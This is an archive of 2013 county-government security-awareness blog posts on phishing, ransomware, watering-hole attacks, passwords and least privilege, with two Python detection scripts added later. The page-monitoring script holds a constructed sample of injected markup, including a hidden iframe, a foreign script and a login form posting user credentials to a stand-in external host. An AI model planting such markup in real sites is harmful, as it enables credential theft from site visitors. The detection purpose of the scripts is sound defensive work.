Monday, December 23, 2013

A Time for Extra Caution

While many associate the holiday season with warm feelings and focus on doing good towards others at this time of year, it is unfortunately a time when the bad guys kick it into high gear. They know that many people are shopping and looking for bargains, and trying to get all their charitable giving in before the end of the year. It is a perfect time for them to take advantage of us when most of us have our guard down. A tool that is being used more and more by those who want to take advantage of others' "good will" at this time of year is cyber attacks.

We have already discussed phishing attacks on this blog in the past, and being cautious in regards to e-mail is warranted all the time, but especially this time of year. A common tactic used in phishing e-mails, and one that has proven to be especially effective, is shipping or purchase notification e-mails, chock full of links presumably to track your package or check your order status. Many people order items on-line this time of year, and you may get many perfectly legitimate shipping notification e-mails. The fact that you are expecting a shipping notification e-mail makes this type of attack more effective. You are more likely to click on the links in the message or download the attachments without reading the entire message carefully. Don't fall for this trick! Make sure you read the entire e-mail and know how to tell a legitimate shipping notice from a bogus one. The easy and obvious check: did you order the product mentioned in the first place? Hover over links and read the URL that they point to. Does it match the business that sent the notification? On a smart phone, long press on a link to see the actual URL. (Be extra careful here because it can be very easy to accidentally activate the link.) See our article from October 15, 2013 for tips on how to spot a phishing e-mail.

Another thing that can be dangerous this time of year is e-mail and on-line greeting cards. Be very careful with these as well. Do you absolutely know and trust the sender? Perhaps even more importantly, are you confident enough in their tech savvy to be sure they were not duped when they chose a greeting to send? If the answer to either question is no, it is probably best to delete these greetings unopened. Many have dangerous payloads that aren't worth the risk.

It is kind of sad, but unfortunately necessary, that we have to send you these reminders at this time of year. But letting your guard down now can ruin what for many is an enjoyable season.

Monday, October 28, 2013

Mobile Device Security

Hello Everyone,

This week we are going to continue our coverage of “Securing the Human” by discussing Mobile Device Security.

In today’s busy lifestyles, each of us seems to be more and more glued to our mobile devices. With that in mind, we also increase the risk of losing those devices or having them stolen. If your device is lost or stolen, are you prepared to protect the contents of your device and to ensure that the data that resides on it is not compromised?

One of the most effective ways you can protect your information is to secure your device while you still have it.  A great place to start is by enabling some type of Access Protection, such as setting a PIN, Password or Pattern Lock that is required to unlock your device before anything can be accessed. This helps ensure that only authorized users can use and access the information on your device.

To establish these settings:
  • On an Android Device, it can be set up by going to SETTINGS > LOCATION & SECURITY > SCREEN LOCK
  • On an iPhone or iPad, access protection can be set up by going to: SETTINGS > GENERAL > SET SCREEN LOCK
  • Once you have set your PIN, Password or Pattern Lock, you will also want to make sure to change the Auto-Lock settings from “None” to a specific amount of time so that the screen automatically locks after a specified time

Another security feature you can enable is Remote Data Wipe. This allows you to wipe the device remotely if it is lost or stolen. This can be done on the device itself to wipe the device after 10 failed passcode attempts, or you can utilize apps, such as the iPhone / iPad app “Find My Phone” or Android apps such as “SeekDroid”, “AndroidLost” and “Cerberus”, which will allow you to access the device remotely from a PC to wipe the device and also allow you to possibly locate your device if it is still powered on. Check with your IT Department as well, as they may already have processes such as these in place through corporate policy.

***REMINDER: More tips on Securing the Human will be given by this year’s fall school keynote speaker, Lance Spitzner. You won’t want to miss his eye-opening and thought provoking presentation.

Also, don’t miss ICIT being featured in an international webcast given by SANS on Tuesday, October 29th at 4:00 pm EDT. The story of Iowa Counties Paying IT Forward will be presented. Click here for more information and to register.

Until next week, be prepared and protect your mobile devices!


Thank you!


Gina Erickson
IT Director - Des Moines County
513 N. Main Street
Burlington, IA  52601
Ph:  319.753.8238
Cell:  319.759.7824


Tuesday, October 15, 2013

Clicking Away!

Hi Everyone,

I wanted to continue our discussion about “Securing the Human.” Many times I will be removing some spyware or virus from a user’s computer, and I always get the question, “How did that get in there? Don’t we have stuff that takes care of this?”

That is a great question! Counties spend thousands of dollars on security hardware and software to keep our systems from being infected. They do a pretty good job, but no system is perfect and we need to look at shoring up all the parts of the county systems. One part of the system that we can strengthen up right away is the human part. (That means you!)

We, the county employees, need to be educated and made aware of how we can do our part to make sure our data and computer systems are safe. Many times a virus or piece of spyware can be traced back to a simple click of a mouse when we aren't really paying attention. What did that screen say that you just clicked yes on? One example is the ask.com toolbar. I have had people ask me how in the world did that get there? What happened to my Google? I then take them through a Java update and, lo and behold, there is the screen during the update asking if you want to install the ask.com toolbar. Usually most people never see that screen because they click right through it to get the update, never understanding they just installed an annoying toolbar on their web browser. Pretty hard to stop that evil virus or spyware if we are the ones letting it in past all of the systems.

The Stop.Think.Connect website (http://stopthinkconnect.org/) offers a host of good information on making us all better users of the internet at work and at home. You can take all of the cyber education you learn at work and apply that to your home internet use. Everybody wins!

***REMINDER: More tips on securing the human will be given by this year’s Iowa State Association of Counties Fall School of Instruction keynote speaker, Lance Spitzner. You won’t want to miss his eye-opening and thought inducing presentation.

Also, don’t miss ICIT being featured in an international webcast given by SANS on Tuesday, October 29 at 4:00 pm EDT. The story of Iowa Counties "Paying IT Forward" will be presented. Click here for more information and to register.

Next week I want to focus on Phishing. It is probably the nastiest and most effective tool that hackers are using to get into county systems, and we need to spend a little time and focus on educating ourselves on how to dodge this very nasty bullet.

Thank you,

Joel Rohne
IT/GIS Worth County

641.324.3668

Phishing and Spear Phishing

No doubt you have heard the term "phishing", but perhaps you are not quite clear on what it is. More recently it seems we hear more about "spear phishing". What is the difference? How can you protect yourself?

Wikipedia has a great article on phishing that explains both terms, some of the history of the practice, including how it got its name, and many of the specific techniques used. Like many security related resources however, some of it can get fairly technical, making it difficult for some to understand what it means to them. The story of how the name "phishing" came about is fairly geeky and technical and relates to when the practice first became prevalent on America On Line. Regardless of how the name actually came about, I think it is a good metaphor for describing the practice. When I think of literal fishing, two methods come to mind, the kind of fishing I used to do with my dad, where we would drop a line in the water and hope something came along and took a bite, or the TV documentaries showing commercial fishermen casting these huge nets to pull in a large haul. Both of these images could be used to help explain the practice of phishing. The goal is to catch someone off guard and steal information from them, such as usernames, passwords, financial account information, real money, etc.

The dropping a line and waiting for someone to bite image aptly describes phishing because e-mail (or in some cases a phone call) is used to deliver the bait, and the bad guys are just hoping that someone takes it. A message might indicate that your account is about to expire. Or maybe you need to renew some information to keep receiving some benefits or services. Or perhaps there is something "you just have to see!" When you click the link suggested, instead of taking you to a legitimate web site, it takes you to a site where you enter the sought after information and the bad guys now have it. In many cases, both the e-mail and the web site might look very convincing. In other cases, opening a malicious attachment is the action desired, infecting your computer with mal-ware, which can then be used to gather more information from you or to enable your computer to be used to attack others.

The casting a wide net image also aptly describes phishing because that is generally how the bad guys operate, sending their e-mails to a wide audience, perhaps thousands or even millions of targets. The wider they cast the net, the more likely they are to get numerous victims to take the bait. The problem for the bad guys when it comes to phishing is that the larger the net cast, the harder it is to make the message look appealing. For example, if I receive an e-mail that my account at a bank needs to be renewed, but I don't bank there, I am not likely to take the bait. Many people who get the message will be a customer of that bank, but not everyone, and the more bogus e-mails someone receives, the more aware they become that they might eventually be a target of a phishing attack. Over time, as awareness increases, phishing can become less effective for some targets. It is still effective, so it keeps happening and there is still a need to alert, but the bad guys have, as they always do, changed their tactics to become more effective.

Spear phishing has become more prevalent in recent years. The difference between spear phishing and regular phishing, is that the spear phishing attacks are much more targeted. In literal spear fishing, you have to get up close and personal with your target, taking careful aim and striking at just the right time. Spear phishing is like that. The bad guys take the time to get to know their targets, the specific products or services they use, the timing of important events in their life, really as much as they can about them. The target of the attack is also much smaller, a small specific group of persons, or perhaps in some cases even directed at a specific individual, so the messages can be very personal and perhaps very relevant to what may be important to them at the time. The more targeted the bait, the more difficult to spot and the more likely someone will bite. A recent spear phishing attack targeted at executive level state employees has been in the news. A sample subject is "Annual Form - Authorization to Use Privately Owned Vehicle on State Business". Perhaps you can see how someone might be inclined to open the attached form. If their authorization isn't up to date, they may not get reimbursed for their expenses. In this particular attack, the CryptoLocker ransom-ware is the mal-ware embedded in the attached form, which was mentioned in a previous blog post.

So how can you protect yourself from phishing and spear phishing attacks? Learn how to spot the bait. If an e-mail looks suspicious in any way, it is safest to err on the side of caution. Be especially suspicious of e-mails that create a sense of urgency or require immediate action. E-mails with a generic salutation, such as "Dear Customer", are also a red flag. Also watch out for e-mails with a lot of grammar or spelling mistakes. Legitimate businesses will usually proofread their communications carefully prior to sending them. Don't trust links or attachments. From your PC, you can hover your mouse over a link to see the actual target address. If it doesn't match what is displayed, this should raise an alarm. On a mobile device, previewing the link can usually be accomplished by pressing and holding the link, causing a popup to be displayed. Be careful though, it can be easy to accidentally click the link. As for attachments, only opening ones that you were expecting is a good, safe practice. Also, don't be quick to trust the sender. Just because an e-mail indicates it is from a trusted friend, it doesn't mean that they actually sent it. The sender address can be forged, their computer may be infected with mal-ware, or their e-mail account could have been compromised (probably because they fell victim to a phishing attack). If you receive an e-mail from a friend that contains links or attachments, contact them by another means to verify they actually sent it.
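The two manual checks recommended here and in the December post on shipping notices, hovering over a link to read its real target and asking whether that target matches the business the message claims to be from, can be automated for a mailbox or a mail gateway. The script below is an added example written for this blog post, not something from the original article or from any product; it uses only the Python standard library. The sample message, its sender and every domain in it are constructed for the example, and the "registrable domain" helper is a deliberate simplification (it does not know about public suffixes such as co.uk).

```python
"""Flag links in an HTML e-mail whose real target does not match what the
message displays, or which lead outside the claimed sender's domain."""

import email
import re
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: one honest tracking link, one link whose visible text
# names the shipper while its real target is elsewhere, and one link to an
# unrelated domain.
SAMPLE_EMAIL = """\
From: Example Shipping <noreply@example-shipping.com>
To: you@county.example
Subject: Your package is on its way
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Track your package: <a href="http://tracking.example-shipping.com/t/1234">tracking.example-shipping.com</a></p>
<p>Or <a href="http://example-shipping.com.login-check.example.net/">http://www.example-shipping.com/account</a></p>
<p><a href="http://cdn.bargains-now.example.org/gift.exe">Download your gift card</a></p>
</body></html>
"""


def registrable_domain(host):
    """Last two labels of a hostname: "www.example-shipping.com" -> "example-shipping.com".
    Simplification for the example: it ignores multi-label public suffixes."""
    host = (host or "").lower().rstrip(".")
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


class LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs from <a> elements."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._current = None  # [href, accumulated text] while inside an <a>

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._current = [dict(attrs).get("href", ""), ""]

    def handle_data(self, data):
        if self._current is not None:
            self._current[1] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._current is not None:
            href, text = self._current
            self.links.append((href, " ".join(text.split())))
            self._current = None


# Something that looks like a URL or hostname inside the visible link text.
DOMAIN_IN_TEXT = re.compile(r"(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})", re.I)


def suspicious_links(raw_message):
    """Return (href, visible_text, reason) for every link worth a second look."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    _, sender_addr = parseaddr(msg["From"] or "")
    sender_domain = registrable_domain(sender_addr.rsplit("@", 1)[-1])
    body = msg.get_body(preferencelist=("html",))
    if body is None:
        return []
    collector = LinkCollector()
    collector.feed(body.get_content())
    findings = []
    for href, text in collector.links:
        target = registrable_domain(urlparse(href).hostname)
        shown = DOMAIN_IN_TEXT.search(text)
        if shown and registrable_domain(shown.group(1)) != target:
            findings.append((href, text, "link text shows a different domain than the real target"))
        elif target != sender_domain:
            findings.append((href, text, "link leads outside the sender's domain"))
    return findings


if __name__ == "__main__":
    for href, text, reason in suspicious_links(SAMPLE_EMAIL):
        print(f"{reason}: '{text}' -> {href}")
```

The first link passes both checks and is not reported; the second is reported because the text shows the shipper's domain while the real target is under example.net; the third is reported because its target has nothing to do with the sender. A forged From header defeats the second check, which is why the post's advice to confirm with the sender by another channel still applies.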

By using common sense and being generally cautious when using e-mail, you can help protect yourself and others from becoming a victim of a phishing attack.

Tuesday, October 1, 2013

We Don't Negotiate with Terrorists

The timing was ironic.  Last night I was at the office when the date changed to October 1, 2013; the beginning of National Cyber Security Awareness month.  The reason I was at the office was due to a user installing the CryptoLocker ransomware on their machine.  This particularly nasty and ingenious piece of software encrypts all of the Word, Excel, PDF, and image files it can find on local and network drives.  It then taunts you with the ransom, $300, to get all of your documents decrypted. 

The user had opened an innocent looking email with a zip attachment.  Inside that zip attachment was an executable file designed as a major money maker for these criminals.  It was a spear phishing attack and it worked.

I first found out about the issue at around 10:30 p.m. when my phone started buzzing the buzz of numerous emails arriving.  I was shocked when that number showed 160+ unread emails and it was climbing quickly.  The emails were from the antivirus agent installed on that machine sending out alerts that something malicious was being blocked.  So I logged onto that machine and saw the CryptoLocker window along with a note that all files are encrypted.  The threat had managed to get through our email filter and our up to date antivirus agent was helpless to stop it.

I immediately turned off the machine and drove in to work to fix whatever damage it had caused.  I restored the network files that had been encrypted, but the local files were unrecoverable.  We restored the machine from our image and the user lost a day’s work.  Paying the $300 was never an option; we don’t negotiate with terrorists.

We have done some phishing attack training with our users but that didn't stop this attack.  I sent out an email to all users late last night telling them to be alert and think before opening email attachments or clicking on email links.  I included a link to the July, 2013 OUCH! Newsletter from SANS that talked about spear phishing.  I think the message was heard loud and clear because it hit close to home.  It was also a good reminder that I need to do a better job protecting our network.  When attacks like this materialize you go through the steps you could take to prevent it from happening again in the future.


National Cyber Security month gives you an excellent platform to push for more security and training for your users.  These threats are real and they can happen to you.

Monday, September 30, 2013

Why Worry About Watering Holes?

Perhaps you have seen recent news stories about "watering hole" attacks and wondered what they were? More importantly, is it something we in county government have to worry about?

A watering hole attack takes its name from nature, where predator animals, such as lions, rather than chase their prey, simply wait for them to come to them by staking out the watering hole. The prey animal's thirst will eventually force it to seek out water despite the looming danger. In cyber security, the predators will compromise a popular or necessary site used by their targets in order to spread malware, and thereby gain access to their target's computers or information. Although perhaps more difficult than other methods, this form of attack is becoming increasingly popular, especially as security awareness programs make other less difficult attacks, such as phishing, less successful.

Watering hole attacks are absolutely a concern for counties. Because of the wealth of information in possession of counties, much of which is tied directly to a person's personal and financial activities, we are a target for the bad guys. We have information and they want it. Additionally, many counties use the same vendors, the same state services, the same news and information sources, etc. This commonality makes it easy for a predator to identify resources that a large number of us will eventually seek out.

Perhaps of even bigger concern is that we have web services and resources that many in our communities rely on. If certain types of businesses or organizations become a target, our resources might be viewed as the perfect "watering hole" that would attract that target. This makes diligence on our part essential, to keep our resources secure and/or to make sure that our vendors are doing so.

Similar to phishing attacks, in which case there is little we can do to avoid receiving the phishing e-mails, there is also little we can do to prevent a site that is out of our control from becoming compromised. That is the job of the administrator of that site. The best defense then is education and awareness. Recognizing that a site that we rely on could potentially become compromised and knowing what to watch out for can protect us. Avoid downloading software and plugins that are not absolutely essential. Make sure your anti-malware software is up to date and your operating system is patched. Do links to social media sites and login forms look out of place? Are they the same as the last time you visited? Being alert can keep you safe.

In the case of sites we do have control over, the responsibility is on us and our service providers to keep them safe. Can we avoid requiring any sort of plugin for accessing the needed information? Are links to social media necessary? Content Management Systems (CMS) in particular are a potential source of compromise. If we use a CMS for our site, is the CMS software kept up to date? Is the site's security set up properly so only trusted users can post content? Has it been properly set up to not allow certain types of potentially malicious content, such as iframes and javascript? Do we have tools in place to check for mal-ware and unwanted links? Are we monitoring the site regularly?
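The questions in the two paragraphs above, "are the links and login forms the same as the last time you visited?" and "do we have tools in place to check for unwanted content and are we monitoring the site?", amount to keeping a baseline of a page's active content and diffing it against what is served now. The script below is an added example written for this post, not code from the blog or from any CMS; it uses only the Python standard library. Both page snapshots and the site hostname are constructed for the example.

```python
"""Compare the active content of a web page (scripts, iframes, form targets,
inline event handlers, external links) against a saved baseline and report
what appeared or disappeared."""

from html.parser import HTMLParser
from urllib.parse import urlparse

# Elements that can load or execute code, or send what a visitor types somewhere.
WATCHED = {
    "script": "src",
    "iframe": "src",
    "form": "action",
    "object": "data",
    "embed": "src",
}

# Constructed baseline snapshot of the county's own page.
BASELINE = """<html><body>
<script src="/static/site.js"></script>
<form action="/login" method="post"><input name="user"><input name="pass" type="password"></form>
<a href="https://www.facebook.com/countyexample">Facebook</a>
<a href="/records">Records</a>
</body></html>"""

# Constructed snapshot of the same page after someone managed to post
# content through the CMS: a foreign script, a login form that now submits
# elsewhere, a hidden iframe and an inline event handler.
COMPROMISED = """<html><body>
<script src="/static/site.js"></script>
<script src="http://cdn.stats-collector.example.net/a.js"></script>
<form action="http://portal-login.example.net/collect" method="post"><input name="user"><input name="pass" type="password"></form>
<a href="https://www.facebook.com/countyexample">Facebook</a>
<a href="/records">Records</a>
<iframe src="http://ads.example.net/frame" width="1" height="1"></iframe>
<img src="/logo.png" onerror="loadTracker()">
</body></html>"""


class ActiveContentCollector(HTMLParser):
    """Records where a page loads code from, where its forms submit to, and
    which foreign hosts it links to."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.items = set()

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in WATCHED:
            self.items.add((tag, attrs.get(WATCHED[tag], "(inline)")))
        # Inline event handlers (onload, onerror, ...) are script on any element.
        for name in attrs:
            if name.startswith("on"):
                self.items.add(("handler", f"{tag}@{name}"))
        if tag == "a":
            host = urlparse(attrs.get("href", "")).hostname
            if host and host != self.site_host:
                self.items.add(("external-link", host))


def fingerprint(html, site_host):
    """The set of watched items on one page snapshot."""
    collector = ActiveContentCollector(site_host)
    collector.feed(html)
    return collector.items


def new_active_content(baseline_html, current_html, site_host):
    """Items present now but not in the baseline, and vice versa."""
    before = fingerprint(baseline_html, site_host)
    now = fingerprint(current_html, site_host)
    return {"added": sorted(now - before), "removed": sorted(before - now)}


if __name__ == "__main__":
    report = new_active_content(BASELINE, COMPROMISED, "www.county.example")
    for kind, value in report["added"]:
        print(f"NEW {kind}: {value}")
    for kind, value in report["removed"]:
        print(f"GONE {kind}: {value}")
```

Run on a schedule against the live page, a non-empty "added" list (a foreign script, an iframe, a form that now posts to another host) is exactly the change a watering hole compromise introduces, and it surfaces whether the change came through a CMS weakness, a stolen editor account or a vendor's hosting. The baseline must be refreshed deliberately after every intended content change, otherwise the alerts become noise.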

Humans tend to be trusting, and the bad guys know that. That is why watering hole and phishing attacks work. By being a little less trusting, we can protect ourselves and those that we serve from these sort of attacks.

Monday, September 16, 2013

Too Many Passwords!

As a county employee you probably have numerous applications and services you use that require passwords. It seems every state agency that you interact with has at least one web site you need to login to. Some have several. Many of the various affiliates of ISAC have their own web projects, such as the ICIT GIS Data Repository or IowaLandRecords. Many of our vendors offer web sites or services we need to use on a regular basis. And then there are the numerous applications we use each and every day within our own county.

With so many applications and services, it is probably not possible for the average person to remember a unique password for each and every one of them. A common practice that many use to deal with this password overload is to reuse the same password for everything. This might seem like a reasonable approach. It sure beats writing them down and risk someone finding them,  right? Wrong! Password reuse is incredibly dangerous. There have been countless reports in recent years of security breaches involving leaked passwords. If your password is leaked or shared for one service, and you use the same password for other services, the risk is very high that all of your accounts can be compromised.

A better approach is to use a password manager to keep track of all your passwords. Password managers allow you to store all of your passwords, and other sensitive information, in an encrypted file or database. You then access them with a master password that you can remember. Ideally your password manager is accessible all the time, so an application that you can run on your smart phone is a good option. Another option is a web based password manager, but remember that this is sensitive information, so it is vital to pick a provider you can trust.

The product that I use for my personal password manager is KeePass Password Safe. This is an open source product, so it is free to use, and the source code is open to inspection, so you can have confidence in the encryption implementation. I use an Android smart phone, so I use KeePassDroid to have anywhere access to my passwords. For iPhone users, there is MiniKeePass.

For organizational use, there are some limitations to KeePass, so we use a product called PasswordState to manage passwords at the county. This is a commercial product, and we pay per user, but since many of the passwords we use need to be shared among employees and/or survive employee turnover, this is a great tool for secure, centralized password management. It is a web based product, so it is also accessible from a smart phone, although the user interface is clearly not designed for touch or small screens.

Of course these are just a couple of products that are available for password management. Perhaps you have a favorite already. Regardless, passwords aren't going away anytime soon, so effective password management is an important step in keeping your accounts secure. So get a good password manager and start using it!

Tuesday, September 10, 2013

Who, Me?

In the past two weeks I've done three different security seminars with three different organizations and their security staff.  The one trend that continues to surprise me, and was confirmed at all three events, is that most employees still do not realize they are a target.  I continue to be surprised by this, as I thought with all the media attention, both in peoples' lives and at work, they would realize they have value and bad guys are after them.  Based on what I'm seeing that is not the case.

That does not bode well when securing the human element.  To change peoples' behaviors we need to engage them, and we will never achieve that first step until they realize they are a target.  If you are looking to secure your employees, contractors and staff, the first question you have to answer is do they even realize they are a target?  If not, then do not even bother trying to teach them how to secure themselves.  Instead explain to them who is targeting them, how and why.  Once you have their attention, then you can begin changing behaviors.

Lance Spitzner is the training director for SANS Securing The Human.  To learn more about human security, visit http://www.securingthehuman.org/resources.

Monday, September 9, 2013

The NSA, Internet Encryption, and What It Means for Iowa Counties

No doubt you have seen the recent news regarding the NSA "cracking" internet encryption techniques. Encryption is a fundamental tool for ensuring privacy and security of numerous internet transactions, including financial data and privacy mandates which affect counties, such as HIPAA and CJIS. Many of the news stories, especially those targeted toward a non-technical audience, tend to exaggerate the implications. Others tend to focus on the NSA and what this latest leak reveals about their practices. I don't want to add to either of those conversations. I do think however there are some lessons, none of them necessarily new, that we can learn from.

First off, I would like to mention that one of the best analyses that I have seen in regards to what the NSA is able to do was written by Johannes Ullrich and published on the Internet Storm Center's diary this morning. I believe his entry entitled SSL is broken. So what? adequately summarizes the real nature of what occurred and what the appropriate technical response should be.

Despite all the attention that it is receiving, the fact of the matter appears to be that the NSA isn't actually cracking the encryption, they just have a way to get around much of it. The fact that the NSA has a way around encryption probably does mean that eventually others will too. The good news in my opinion is that now that this vulnerability has been exposed, there will no doubt be efforts to address it. Hopefully the necessary changes to fix the issue can be made before the ways to actually exploit the various backdoors are leaked.

Ultimately however, this capability of the NSA doesn't really change anything. Encryption is still important for securing internet transactions, and most of the bad guys don't have the resources to break the encryption. As Dr. Ullrich mentioned in his article, in many cases vulnerabilities in client software, or social engineering techniques, resulted in data leaks, not failures in the encryption infrastructure. It is much easier for hackers to get what they want through insecure human behaviour.

One of these insecure human behaviours is running out of date software. I can't even count the number of times over the years that I have had to install new software on servers specifically to address issues with the SSL implementation. New notices regarding adjustments to how systems are setup, encryption key lengths, etc. are released all the time. It is of vital importance to stay on top of these, not to ignore them. In many cases Iowa counties rely on a vendor for these services. When is the last time you checked on how they are doing in this regard? Do you have tools in place to check for vulnerabilities in your systems where possible? Just making sure you keep the systems you are responsible for up to date can go a long way in keeping your private communications private.

Another insecure human behaviour is just how easily we can be manipulated by clever people. The bad guys exploit this all the time. It is usually much easier to just bypass the technology than trying to break it. That is essentially what the NSA has done. They have convinced others, whether it be encryption software developers or service providers, to give them the keys to their kingdom. Hackers try to do the same thing to us, through phishing e-mails or compromised web sites we visit. The best way to combat this is through education. By increasing awareness of how these devices work, how to spot them, and what to do when we fall prey, we can better protect ourselves, our organizations, and the internet transactions we depend on.

Like most organizations, counties certainly fall into the category of having "limited time and limited resources to fight unlimited worries." By focusing on the things we have control over and not getting distracted by the latest sensational headline, we can continue to make our counties more secure.

Sunday, September 8, 2013

The Importance of the Least Privilege Principle

One of the things we were reminded of last week during the SANS presentation was just how bad humans are at estimating risk. I think the assumption that many people have is that those of us who work in IT should be better at it. Unfortunately, it seems that many in the IT field tend to sacrifice good principles in favor of expedience or efficiency, and in doing so increase the risk to an organization's computer systems. A recent e-mail conversation regarding the practices of some of our vendors who provide software and services proves this point.

The discussion surrounded whether or not a certain vendor should have sysadmin level access to the county's database servers. The vendor argued that they could not adequately provide support without this access, and that some of their processes required this level of access. The problem with this is that it violates the security principle of "Least Privilege", which mandates that a person or process must be able to access only the information and resources that are necessary for its legitimate purpose.

We know the vendor understands this principle, because it is a part of their software and the practices they recommend, which includes a separation of duties, access control lists to specific functionality and records within their software, and audit logs to track who did what. The problem is, that when this principle starts to make it more difficult for them, and especially when it is outside their own systems, they no longer care about it. It is expedient to just set access to "wide open" by granting them or one or more of their accounts the "sysadmin" role in the database server. But should that resource or account be compromised, it exposes not just their systems, but the entire database server to risk.

While the original conversation focused on one specific vendor, I am not mentioning them by name because so many of our vendors are guilty of it. What makes matters worse is that many of these vendors use the same credentials in one county after another, so if one organization is compromised, all of their other customers may be easily compromised as well. This demonstrates the importance of another reminder we were given during the SANS presentation last week, which was the dangers of reusing passwords.

I believe in this day and age it is vital that we hold our software vendors to the highest standards. They should be endeavoring to adhere to best practices when it comes to security, such as the "Least Privilege" principle, and when they do not, we should demand that they change. In order for this to work though, it will take more than just the IT people demanding that these practices be changed. For starters, there are still many counties that do not have in-house IT people. Additionally many of the vendors tend to place more weight on the opinions of the policy makers and those who hold the purse strings than they do the IT staff.

No matter what our position is with the county, whether it is IT, an elected or appointed official, an employee or even a citizen, whenever we have a chance to interact with one of our vendors, we should reinforce the importance of adhering to best practices when designing, implementing and supporting the software and services they provide.

For more information on best practices when it comes information security, our friends at SANS provide a wealth of free information.

Saturday, September 7, 2013

Resurrection of ICIT Security Committee

On Friday, September 6th, 2013, to show their support of ICIT, especially our county technology assessment program, representatives from the SANS Institute's Securing the Human presented information on "Next Generation Security Awareness Programs" and "Phishing and Measuring Impact". The presentations were part of the program at ICIT's first Tech Team Workshop, an event designed to refine and formalize the technology assessment program for Iowa Counties that ICIT began in November 2011. To date ICIT has performed assessments for ten of Iowa's counties.

Both informative and energizing, Lance Spitzner's presentations provided timely reminders of why Security Awareness is so important and should be a priority for counties. As a result of the presentations and the discussion among ICIT members that followed, I have decided to create this blog, which will be open for posting by other ICIT Security Committee members as well. The focus of this blog will be to provide information regarding Cyber Security that is relevant to Iowa Counties.

A big Thank You! to SANS for their support and for resurrecting our security committee, which has been floundering for some time. We hope you enjoy our blog!
